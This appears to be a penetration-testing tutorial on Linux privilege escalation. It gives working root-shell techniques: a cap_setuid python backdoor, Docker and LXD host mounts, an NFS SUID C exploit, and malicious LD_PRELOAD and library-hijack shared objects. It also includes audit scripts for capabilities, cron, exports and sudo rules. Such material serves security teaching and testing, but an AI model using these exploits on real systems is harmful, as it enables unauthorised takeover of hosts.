Linux Privilege Escalation
Hello hackers, I've finally decided to put together all of the different ways to perform privilege escalation on a Linux system.
This assumes you already have a shell on the target. Depending on how that access was obtained, it is probably not a root shell; the techniques below are ways to get from that foothold to root.
Gathering Information About the System
To escalate privileges on a Linux system, it’s crucial to gather as much information about the environment as possible. This helps identify potential weaknesses or misconfigurations that can be exploited.
1. Check OS Information
cat /etc/os-release
2. Inspect PATH
echo $PATH
3. List Environment Variables
env
4. Kernel Version
uname -a
5. List Available Shells
cat /etc/shells
6. Routing Table
route
netstat -rn
ip route
7. ARP Table
arp -a
ip neigh
(route, netstat and arp come from net-tools, which many current distributions no longer install; the ip equivalents from iproute2 are always available.)
8. Find SUID/SGID Files
find / -perm /6000 -type f 2>/dev/null
(-perm /6000 matches files with either the SUID or the SGID bit set; -perm /4000 lists SUID files only.)
9. Running Processes
ps aux
10. Installed Packages
dpkg -l
rpm -qa
11. Crontab Entries
crontab -l
cat /etc/crontab
12. Listening Ports and Active Connections
netstat -tulnp
ss -tulnp
(A service bound only to 127.0.0.1 is invisible from outside but reachable from your shell, and often runs as root.)
13. Mounted Filesystems
mount
14. Writable Directories
find / -writable -type d 2>/dev/null
find / -perm -o+w -type d -not -path "/proc/*" 2>/dev/null
(The first lists directories your user can write to, the second lists world-writable ones; both matter when a root process writes to or executes something from them.)
15. Check sudo Privileges
sudo -l
Capabilities
Capabilities split the privileges of root into independent units (CAP_SETUID, CAP_NET_RAW, CAP_SYS_ADMIN, ...) that can be granted to a process or attached to an executable file. A file capability is stored as an extended attribute and is honoured whoever owns the file, so a binary with CAP_SETUID in its effective set is as good as a SUID-root copy of it.
Viewing Capabilities
getcap /path/to/binary
getcap -r / 2>/dev/null
Setting Capabilities (requires root)
sudo setcap 'cap_net_bind_service=+ep' /usr/bin/somebinary
Removing Capabilities
sudo setcap -r /usr/bin/somebinary
(sudo setcap 'cap_net_bind_service=-ep' /usr/bin/somebinary clears just that one capability's flags instead of all of them.)
Effective Capabilities of the Current Process
capsh --print
Example: CAP_SETUID Backdoor
A copy of the interpreter with cap_setuid in its effective set gives a root shell to anyone who can execute it. The same one-liner works against any python that getcap -r / reveals with that capability.
cp "$(command -v python3)" ./python    # cp does not carry capabilities over; they are set afresh below
sudo setcap cap_setuid+ep ./python
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
The copy has to live on a filesystem that is not mounted nosuid, since that mount option disables file capabilities as well as SUID bits.
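Added example (mine, not part of the original post): a filter that reads getcap -r output and prints only the entries carrying a capability that is enough to escalate on its own. The list of capabilities treated as dangerous is my own choice, and the getcap lines in the usage comment are constructed.

```sh
#!/bin/sh
# Added example, not from the original post. Filters `getcap -r /` output
# down to capabilities that are usually enough to become root or read
# protected files. The list is my own choice, not an authoritative one.
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_chown cap_fowner cap_sys_admin cap_sys_ptrace cap_sys_module"

# flag_dangerous_caps: reads getcap lines on stdin and prints "<path> <cap>"
# for every dangerous capability whose Effective flag (e) is set.
# Both getcap output styles are understood:
#   older libcap:  /usr/bin/ping = cap_net_raw+ep
#   newer libcap:  /usr/bin/ping cap_net_raw=ep
flag_dangerous_caps() {
    while read -r path rest || [ -n "$path" ]; do
        [ -n "$path" ] || continue
        rest=${rest#= }                          # drop the old-style "= "
        for clause in $rest; do                  # e.g. cap_a,cap_b+eip
            case "$clause" in *-*) continue ;; esac   # a "-" clause clears flags
            names=${clause%%[=+]*}               # comma-separated cap names
            flags=${clause#"$names"}             # "=ep" or "+eip"
            flags=${flags#?}                     # strip the operator
            case "$flags" in *e*) ;; *) continue ;; esac
            for cap in $(printf '%s' "$names" | tr ',' ' '); do
                for bad in $DANGEROUS_CAPS; do
                    if [ "$cap" = "$bad" ]; then
                        printf '%s %s\n' "$path" "$cap"
                    fi
                done
            done
        done
    done
    return 0
}

# On a target:  getcap -r / 2>/dev/null | flag_dangerous_caps
# Constructed sample input:
#   /usr/bin/ping cap_net_raw=ep
#   /usr/bin/python3.10 cap_setuid=ep
#   /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
# prints only "/usr/bin/python3.10 cap_setuid".
```

Capabilities that are only permitted or inheritable (flags p or i without e) are skipped: the binary would have to raise them itself before they count.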
Docker Privilege Escalation
Membership of the docker group grants access to the Docker socket, and whoever controls the daemon controls the host: the daemon runs as root and will happily start a container with the host's root filesystem bind-mounted inside it.
docker run --rm -it -v /:/mnt alpine chroot /mnt sh
That is a root shell over the host filesystem; from it you can add a user to /etc/passwd, drop a SUID shell or read /etc/shadow. Check with id whether you are in the group, and with ls -l /var/run/docker.sock whether the socket happens to be writable by you anyway.
LXC / LXD Privilege Escalation
Members of the lxd group can do the same with LXD. Transfer a minimal container image (Alpine, for example) to the target, then build a privileged container with the host's root filesystem mounted inside it:
lxd init --auto    # only if LXD has not been initialised yet
lxc image import alpine.tar.gz --alias alpine
lxc init alpine dreamy -c security.privileged=true
lxc config device add dreamy mydev disk source=/ path=/mnt/root recursive=true
lxc start dreamy
lxc exec dreamy /bin/sh
Inside the container the host's filesystem is at /mnt/root, and because the container is privileged you are real root over it (for example chmod u+s /mnt/root/bin/bash, then run bash -p on the host).
SUID Privilege Escalation
A SUID binary runs with the effective UID of its owner. If root owns it and it can be made to run another program, read a file or write a file, that happens as root. Find SUID binaries and compare the list against GTFOBins:
find / -perm -4000 -type f 2>/dev/null
Python SUID Exploit Example
If a python binary is SUID root (or carries cap_setuid), exec a shell from it. The -p flag matters: without it, bash (and recent versions of dash) resets the effective UID back to the real one on startup and the shell is unprivileged.
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
(Calling os.setuid(0) before the execl also works; it makes the real UID 0 as well, so -p is then unnecessary.)
Cron Job Privilege Escalation
Jobs run by root live in root's crontab, /etc/crontab, /etc/cron.d/* and the /etc/cron.{hourly,daily,weekly,monthly} directories. The weaknesses to look for are scripts referenced by a root job that your user can write to, commands given by a relative name (resolved through the PATH set in the crontab), and jobs that run something from a directory you can write to or that no longer exists.
Check cron jobs:
crontab -l
cat /etc/crontab
ls -la /etc/cron.d /etc/cron.*
Monitor cron jobs:
./pspy64
(pspy watches /proc for new processes, so it shows root's jobs as they fire without needing root, including user crontabs you cannot read.)
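Added example (mine, not from the original post): a small checker for the cron case. It reads an /etc/crontab-style file (the 7-field format with a user column, as used by /etc/crontab and /etc/cron.d/*) and reports, per job, absolute paths on the command line you can write to, absolute paths that do not exist, and commands given by a relative name. The crontab and script paths in the usage comment are constructed.

```sh
#!/bin/sh
# Added example, not from the original post. Finds cron jobs you could
# influence. Output lines:
#   WRITABLE <user> <path>  an absolute path on the command line you can edit
#   MISSING  <user> <path>  an absolute path that does not exist (you may be able to create it)
#   RELATIVE <user> <cmd>   the command is resolved through cron's PATH

# cron_job_targets FILE: print "<user> <command>" for every job line,
# skipping comments, blank lines and NAME=value settings.
cron_job_targets() {
    file=$1
    set -f                                   # fields like */5 must not glob
    while read -r line || [ -n "$line" ]; do
        case "$line" in ''|\#*) continue ;; esac
        set -- $line
        case "$1" in
            *=*) continue ;;                 # SHELL=, PATH=, MAILTO= ...
            @*)  [ $# -ge 3 ] || continue    # @reboot user command
                 user=$2; shift 2 ;;
            *)   [ $# -ge 7 ] || continue    # m h dom mon dow user command
                 user=$6; shift 6 ;;
        esac
        printf '%s %s\n' "$user" "$*"
    done < "$file"
    set +f
}

# cron_check_writable FILE: classify each job found by cron_job_targets.
cron_check_writable() {
    cron_job_targets "$1" | while read -r user cmd; do
        [ -n "$cmd" ] || continue
        set -f
        set -- $cmd
        set +f
        case "$1" in
            */*) ;;
            *)   printf 'RELATIVE %s %s\n' "$user" "$1" ;;
        esac
        for arg; do
            case "$arg" in
                /*) if [ -w "$arg" ]; then
                        printf 'WRITABLE %s %s\n' "$user" "$arg"
                    elif [ ! -e "$arg" ]; then
                        printf 'MISSING %s %s\n' "$user" "$arg"
                    fi ;;
            esac
        done
    done
    return 0
}

# On a target:
#   cron_check_writable /etc/crontab
#   for f in /etc/cron.d/*; do cron_check_writable "$f"; done
# Constructed sample line "*/5 * * * * root /opt/backup.sh" prints
# "WRITABLE root /opt/backup.sh" when /opt/backup.sh is writable by you.
```

A RELATIVE finding is only interesting if the PATH line in the same crontab contains a directory you can write to, or if the job has no PATH line and cron's default (/usr/bin:/bin) does.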
Exploiting NFS Weak Permissions
Check exports, from the attacking machine and, if you already have a shell, on the target itself:
showmount -e {ip}
cat /etc/exports
The export is exploitable when it is writable (rw) and has no_root_squash set: root on the NFS client is then root on the share, so files you create there are owned by root and the SUID bit you set on them is honoured when they are executed on the server.
Exploit Example:
// exploit.c: built and made SUID root on the attacker's mount of the share,
// then executed on the target
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
On the attacking machine, as root, so that with no_root_squash the copied file is owned by root on the share:
gcc -static exploit.c -o exploit     # static, so the target's libc version does not matter
sudo mount -t nfs {target_ip}:/tmp /mnt
sudo cp exploit /mnt
sudo chmod u+s /mnt/exploit
# Then on target, from the exported directory (/tmp here):
./exploit
If the exported directory is mounted nosuid on the server, the SUID bit is ignored; pick another writable export in that case.
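Added example (mine, not from the original post): before mounting and copying, confirm from the target's /etc/exports that the export really is rw with no_root_squash. The function below parses exports(5) lines (a path followed by client(options) entries) and prints a verdict per client; the exports lines in the usage comment are constructed.

```sh
#!/bin/sh
# Added example, not from the original post. Classifies /etc/exports entries
# so you can see before mounting whether a share is rw with no_root_squash.
# One line per client entry, "<verdict> <path> <client>":
#   ROOT_RW  rw and no_root_squash: a root SUID file planted by a root client is honoured
#   RW       rw but root is squashed: files you create arrive owned by nobody/nfsnobody
#   RO       read-only
nfs_exports_audit() {
    set -f                                       # "*" clients must not glob
    while read -r path clients || [ -n "$path" ]; do
        case "$path" in ''|\#*) continue ;; esac
        clients=${clients%%#*}                   # drop a trailing comment
        [ -n "$clients" ] || clients='*'         # no client list: everyone, default options
        for entry in $clients; do                # e.g. 10.0.0.0/24(rw,no_root_squash)
            client=${entry%%\(*}
            opts=${entry#"$client"}
            opts=${opts#\(}; opts=${opts%\)}
            rw=no; squash=yes                    # exports(5) defaults: ro, root_squash
            for opt in $(printf '%s' "$opts" | tr ',' ' '); do
                case "$opt" in
                    rw)                     rw=yes ;;
                    ro)                     rw=no ;;
                    no_root_squash)         squash=no ;;
                    root_squash|all_squash) squash=yes ;;
                esac
            done
            if [ "$rw" = yes ] && [ "$squash" = no ]; then
                verdict=ROOT_RW
            elif [ "$rw" = yes ]; then
                verdict=RW
            else
                verdict=RO
            fi
            printf '%s %s %s\n' "$verdict" "$path" "${client:-*}"
        done
    done
    set +f
}

# On a target:  nfs_exports_audit < /etc/exports
# Constructed sample line "/tmp 10.0.0.0/24(rw,sync,no_root_squash) *(ro)"
# prints "ROOT_RW /tmp 10.0.0.0/24" and "RO /tmp *".
```

Only a ROOT_RW line is usable with the exploit above, and only from a client address that matches the listed network; an RW export still lets you plant files, but they are owned by the anonymous user and a SUID bit on them buys nothing.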
Sudo + LD_PRELOAD
sudo normally scrubs the environment (env_reset), but an administrator can whitelist variables with env_keep. If sudo -l shows something like
    Matching Defaults entries for user on host:
        env_reset, env_keep+=LD_PRELOAD
then LD_PRELOAD survives into any command you are allowed to run with sudo, and the dynamic loader maps your shared object into that root process before its main() runs.
Malicious Shared Library:
// malicious.c: loaded via LD_PRELOAD into the sudo'ed process
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

void _init() {
    unsetenv("LD_PRELOAD");   // do not re-inject into the shell we spawn
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
gcc -fPIC -shared -o malicious.so malicious.c -nostartfiles
sudo LD_PRELOAD=./malicious.so /usr/bin/ping
Any program from your sudo -l list works in place of ping. -nostartfiles is needed because the C runtime's own _init would otherwise clash with ours; declaring the function as void __attribute__((constructor)) init(void) instead avoids that flag.
Shared Object Manipulation
A binary can carry its own library search path (RPATH/RUNPATH) in its dynamic section, and the loader honours it even for SUID executables, where LD_PRELOAD and LD_LIBRARY_PATH are ignored. If that path is a directory you can write to, you can supply the library yourself. Inspect the binary (called dbs here):
ldd dbs
readelf -d dbs | grep PATH
ldd shows which libraries are resolved and from where (a "not found" entry is the best case); readelf shows the embedded path. Suppose dbs has RUNPATH /dreamy, a directory you can write to, and imports dbquery from thisislibrary.so. Build a replacement library that exports that symbol:
// malicious.c: drop-in replacement for thisislibrary.so
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

void dbquery() {
    printf("Hacked by dreamy\n");
    setuid(0);
    system("/bin/sh -p");
}
gcc malicious.c -fPIC -shared -o /dreamy/thisislibrary.so
Every symbol the binary imports from that library must exist in your replacement, or the loader refuses to start it; nm -D dbs | grep ' U ' lists what the binary expects, and the loader's "undefined symbol" error names anything you missed.
Python Library Hijacking
Python resolves import numpy by walking sys.path in order and taking the first numpy.py or numpy/ package it finds. sys.path[0] is the directory of the script being run, followed by the PYTHONPATH entries, then the standard library and site-packages. Find the load order:
python3 -c 'import sys; print("\n".join(sys.path))'
If a directory earlier in that list than the real module is writable by you (or does not exist but could be created), a numpy.py placed there is imported instead of the real one, and its top-level code runs with the privileges of whoever runs the script, e.g. os.system("/bin/bash") from a root cron job or a sudo-allowed script.
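Added example (mine, not from the original post): a check that reads the sys.path listing from the one-liner above and reports which entries you could plant a module in, either directly or by creating a missing directory. The directory names in the usage comment are constructed.

```sh
#!/bin/sh
# Added example, not from the original post. Reads sys.path entries (one per
# line) and reports where a module could be planted. Output lines are
# "<index> <verdict> <dir>":
#   WRITABLE  an existing directory you can write to
#   CREATABLE a missing entry (e.g. the python3XX.zip placeholder or a stale
#             path) whose nearest existing parent you can write to
# Only entries earlier in the list than the real module matter.
sys_path_audit() {
    n=0
    while read -r entry || [ -n "$entry" ]; do
        dir=${entry:-.}                          # '' in sys.path means the cwd
        if [ -d "$dir" ]; then
            if [ -w "$dir" ]; then
                printf '%d WRITABLE %s\n' "$n" "$dir"
            fi
        elif [ ! -e "$dir" ]; then
            parent=$dir                          # walk up to the first existing parent
            while [ ! -e "$parent" ] && [ "$parent" != / ] && [ "$parent" != . ]; do
                parent=$(dirname "$parent")
            done
            if [ -w "$parent" ]; then
                printf '%d CREATABLE %s\n' "$n" "$dir"
            fi
        fi
        n=$((n + 1))
    done
    return 0
}

# On a target:
#   python3 -c 'import sys; print("\n".join(sys.path))' | sys_path_audit
# Constructed sample: with /opt/app writable and /opt/app/lib missing, the
# entries "/opt/app/lib" and "/usr/lib/python3/dist-packages" print
# "0 CREATABLE /opt/app/lib" and nothing for the second.
```

Run it as the user who will be attacking, not as root, since root can write everywhere and every entry would be reported.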
Using PYTHONPATH + sudo SETENV:
If sudo -l shows the SETENV: tag on a python command (or env_keep includes PYTHONPATH), you can point PYTHONPATH at a directory of your own, which is searched before the standard library and site-packages:
sudo PYTHONPATH=/tmp/ /usr/bin/python3 script.py
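Added example (mine, not from the original post), covering both the LD_PRELOAD section and the PYTHONPATH + SETENV trick: a parser for sudo -l output that points out the preserved environment variables and the commands carrying the SETENV: tag, and lists every rule that becomes a root shell when LD_PRELOAD is kept. The variables treated as dangerous are my own choice, and the sudo -l text in the usage comment is constructed.

```sh
#!/bin/sh
# Added example, not from the original post. Audits `sudo -l` output for the
# two conditions the LD_PRELOAD and PYTHONPATH tricks depend on: an env_keep
# entry preserving a loader/interpreter variable, and a SETENV: tag on a rule.
DANGEROUS_ENV="LD_PRELOAD LD_LIBRARY_PATH PYTHONPATH PERL5LIB"
NL=$(printf '\nx'); NL=${NL%x}               # a literal newline

# sudo_l_audit: reads `sudo -l` text on stdin, prints one finding per line:
#   ENV_KEEP <VAR>                variable survives env_reset
#   NO_ENV_RESET                  the caller's environment is passed through untouched
#   CMD (<runas>) [<tags>] <cmd>  a rule you may run
#   SETENV_CMD (<runas>) <cmd>    rule where any variable may be set on the command line
#   LD_PRELOAD_CMD <cmd>          every rule is a root shell when LD_PRELOAD is kept
sudo_l_audit() {
    keep_ld=no
    cmds=""
    set -f
    while read -r line || [ -n "$line" ]; do
        case "$line" in
            \(*)                                  # "(root) NOPASSWD: /usr/bin/ping"
                runas=${line#\(}; runas=${runas%%\)*}
                rest=${line#*\) }
                tags=""
                while :; do                       # peel off TAG: prefixes
                    case "$rest" in
                        [A-Z]*": "*) tags="$tags${rest%%:*} "; rest=${rest#*: } ;;
                        *) break ;;
                    esac
                done
                printf 'CMD (%s) [%s] %s\n' "$runas" "${tags% }" "$rest"
                case " $tags" in
                    *" SETENV "*) printf 'SETENV_CMD (%s) %s\n' "$runas" "$rest" ;;
                esac
                cmds="$cmds$rest$NL"
                ;;
            *)                                    # Defaults lines: comma-separated, may wrap
                keep=no
                for tok in $(printf '%s' "$line" | tr ',"' '  '); do
                    case "$tok" in
                        env_keep+=*|env_keep=*) keep=yes; tok=${tok#*=} ;;
                        '!env_reset') printf 'NO_ENV_RESET\n'; continue ;;
                        *=*|'!'*) keep=no; continue ;;
                    esac
                    [ "$keep" = yes ] || continue
                    for var in $DANGEROUS_ENV; do
                        if [ "$tok" = "$var" ]; then
                            printf 'ENV_KEEP %s\n' "$var"
                            if [ "$var" = LD_PRELOAD ]; then keep_ld=yes; fi
                        fi
                    done
                done
                ;;
        esac
    done
    if [ "$keep_ld" = yes ]; then
        printf '%s' "$cmds" | while read -r c; do
            printf 'LD_PRELOAD_CMD %s\n' "$c"
        done
    fi
    set +f
}

# On a target:  sudo -l | sudo_l_audit
# Constructed sample: a Defaults line "env_reset, env_keep+=LD_PRELOAD" and a
# rule "(root) NOPASSWD: /usr/bin/ping" print
#   ENV_KEEP LD_PRELOAD
#   CMD (root) [NOPASSWD] /usr/bin/ping
#   LD_PRELOAD_CMD /usr/bin/ping
```

A SETENV_CMD on a python script is the PYTHONPATH case above; an ENV_KEEP of PYTHONPATH or PERL5LIB turns every interpreter rule into the same thing without the tag.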
Have fun, hack ethically!
Regards, dr3amy.